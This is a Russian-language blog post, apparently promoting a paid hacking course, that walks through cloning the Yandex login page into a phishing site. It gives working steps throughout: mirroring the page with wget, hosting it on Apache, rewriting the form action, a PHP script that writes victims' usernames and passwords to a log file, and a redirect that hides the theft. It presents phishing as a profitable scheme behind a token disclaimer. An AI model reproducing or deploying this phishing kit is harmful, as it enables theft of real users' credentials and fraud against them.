Делаем ЛЮБОЙ фишинг сайт за 5 минут!

Всем салют, дорогие друзья!
Сегодня мы рассмотрим тему фишинговых копий известных сайтов. Думаю, вы далеко не впервые о них слышите и даже из новостей представляете, сколько денег может принести подобного рода проект. Сегодня мы наглядно покажем, как это устроено.
Погнали!

Напоминаем, что в данный момент у нас идет набор в Hacker Place Academy с программой CashFlow 2.0, которая получила крупнейшее обновление в истории Академии.
Свободных мест:
🔻 Индивидуальное - 2 свободных места из 4.
🔻 Групповое 5 свободных мест из 9.

👉 Если тебе интересно, то жми сюда и узнай все подробнее!


Ну а мы продолжаем!
Для начала напомним, что статья написана в образовательных целях. Мы не несем ответственности за любой возможный вред, причиненный материалами данной статьи.

Немного теории

Фишинг - один из самых простых способов заполучить персональные данные пользователя. Суть метода заключается в том, чтобы, направив жертву на фэйковый сайт, который один в один похож на настоящий, и заставить её ввести туда свои персональные данные.

Это очень прибыльная тема, на самом деле тут необходимо просто продумать схему - как запутать людей так, что бы они перешли на ваш фейковый сайт и ввели свои данные, соответственно необходимы навыки социальной инжерении.

Создаем клон сайта

Вид сайта задаёт html, а интерактивные элементы на странице управляются JavaScript. Так же в коде сайта могут быть ссылки на сторонние ресурсы, такие как картинки, аудиофайлы и т.п. Поэтому для создания копии не достаточно просто скопировать весь код страницы, надо перенести так же и сторонние ресурсы или переправить ссылки на них. Помимо этого нам нужно изменить логику работы приложения, чтобы данные отправлялись к нам на сервер и сохранялись там.

Мы будем использовать BlackArch Linux, но подойдет совершенно любой дист Линукса.


Для примера попробуем создать реплику сайта страницы авторизации Яндекс.
Её адрес: https://passport.yandex.ru/auth, что бы нам просмотреть исходный код страницы в Firefox достаточно нажать комбинацию клавиш Ctrl+U.
Но нам нет необходимости вручную копировать код и сохранять все картинки:

  • в Linux есть более простое решение. В консоли вводим команду wget --page-requisites --convert-links https://passport.yandex.ru/auth
  • После этого у нас в папке, где была открыта консоль, появится папка passport.yandex.ru в которой будет файл auth.
  • Если открыть его в браузере, то мы увидим то же, что и на странице авторизации Яндекс:
  • Далее необходимо создать сервер на котором будет храниться данная страница.

    Для статьи, в качестве демонстрации мы создадим его локально, но процесс настройки на реальным сервере будет практически таким же. Убеждаемся, что web сервер работает. Для этого надо в браузере перейти на страницу http://127.0.0.1/
  • Если ничего не отобразилось, надо перезапустить веб-сервер 2 командами:

source /etc/apache2/envvars

systemctl restart apache2

  • После того как приветственная страница отображается, нужно скопировать в папку сервера скачанные wget'ом файлы. Для этого переходим в /var/www/html/ и переносим туда ранее скачанный файл auth.
  • Теперь переходим в браузере по адресу auth и нам отображается страница авторизации, она уже крутится на нашем сервере. Теперь надо реализовать функцию сохранения паролей, для этого надо в текстовом редакторе открыть файл auth и найти там страницу, на которую отправляются данные пользователя (за это отвечает параметр action). Для этого нажимаем ctrl+F и набираем action= ...
  • Меняем найденный текст на action="auth.php".
  • В папке с auth создаём новый файл auth.php. Открываем его текстовым редактором и пишем туда

<?php
file_put_contents('log/auth_log.txt', "Username: ".$_POST['Username']." Password: ".$_POST['Password'].'\n', FILE_APPEND);
?>

file_put_contents - функция для записи данных в файл,
log/auth_log.txt - путь к файлу,
$_POST['Username'] - имя пользователя из формы,
$_POST['Password'] - пароль,
FILE_APPEND - указывает, что файл не надо каждый раз перезаписывать, а новые данные добавляются в конец.

  • Теперь надо создать папку, куда будут сохраняться данные. Для этого в папке в login надо в пустом месте кликнуть правой кнопкой мыши и выбрать Open in terminal.
  • В появившимся окне вводим:

    mkdir log
    chmod 777 log


  • Всё, теперь введённый в форму логин и пароль сохраняться у нас на сервере. А чтобы жертва ничего не заподозрила перенаправим её на сайт mail с ошибкой входа:

    Для этого в auth.php перед ?> добавим строку и впишем туда:

    header('Location: https://account.mail.ru/login?fail=1');

Как видите, ничего сложного нет. Пробуем зайти на http://127.0.0.1/auth и ввести туда логин и пароль. Нас перенаправит на реальный сайт Яндекса с ошибкой входа, а данные, которые ввёл пользователь, сохраняться в файле /var/www/html/log/auth_log.tx


Спасибо за внимание, дорогие друзья!

Не важно, какой способ заработка на хакинге вы выбираете, существует огромное количество ниш.

Выберите то, что больше всего нравится именно вам, не сдавайтесь, слушайте наши советы и поверьте, ваша жизнь измениться к лучшему!